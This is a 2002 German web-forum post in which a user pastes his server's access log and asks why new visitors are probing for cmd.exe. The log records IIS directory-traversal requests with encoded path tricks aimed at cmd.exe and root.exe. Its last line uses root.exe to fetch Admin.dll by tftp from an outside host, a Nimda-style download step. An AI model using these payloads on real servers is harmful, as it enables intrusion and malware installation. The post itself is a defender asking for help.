K@rl: neue IP ... und schon nach cmd.exe gescannt

Beitrag lesen

SELF-Forum

neue IP ... und schon nach cmd.exe gescannt

K@rl Homepage des Autors
Informationen zu den Bewertungsregeln

So ist das im Leben - die neue IP Adresse ist erst ein paar Stunden alt .. und die ersten Besucher hinterlassen in access_log das untenstehende ...

Offensichtlich wird nach einer Sicherheitslücke auf NT Servern gesucht. Weiß jemand Genaueres was da abgeht?

Ciao   K@rl

213.131.141.223 - - [27/Feb/2002:15:01:45 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 - "-" "-" 213.131.141.223 - - [27/Feb/2002:15:01:45 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 200 - "-" "-" 213.131.141.223 - - [27/Feb/2002:15:01:45 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 - "-" "-" 213.131.141.223 - - [27/Feb/2002:15:01:46 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 - "-" "-" 213.131.141.223 - - [27/Feb/2002:15:01:46 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 - "-" "-" 213.131.141.223 - - [27/Feb/2002:15:01:46 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 - "-" "-" 213.131.141.223 - - [27/Feb/2002:15:01:47 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 - "-" "-" 213.131.141.223 - - [27/Feb/2002:15:01:47 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 - "-" "-" 213.131.141.223 - - [27/Feb/2002:15:01:47 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 - "-" "-" 213.131.141.223 - - [27/Feb/2002:15:01:51 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-" "-" 213.131.141.223 - - [27/Feb/2002:15:01:51 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 - "-" "-" 213.131.141.223 - - [27/Feb/2002:15:01:51 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 - "-" "-" 213.131.141.223 - - [27/Feb/2002:15:01:52 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-" 213.131.141.223 - - [27/Feb/2002:15:01:52 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-" 213.131.141.223 - - [27/Feb/2002:15:01:52 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 - "-" "-" 213.131.141.223 - - [27/Feb/2002:15:01:53 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 - "-" "-" a-co26-76.tin.it - - [27/Feb/2002:17:52:44 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 - "-" "-" a-co26-76.tin.it - - [27/Feb/2002:17:52:52 +0100] "GET /scripts/root.exe?/c+tftp%20-i%20213.45.145.50%20GET%20Admin.dll%20Admin.dll HTTP/1.0" 200 - "-" "-"

Beitrag melden
Informationen zu den Bewertungsregeln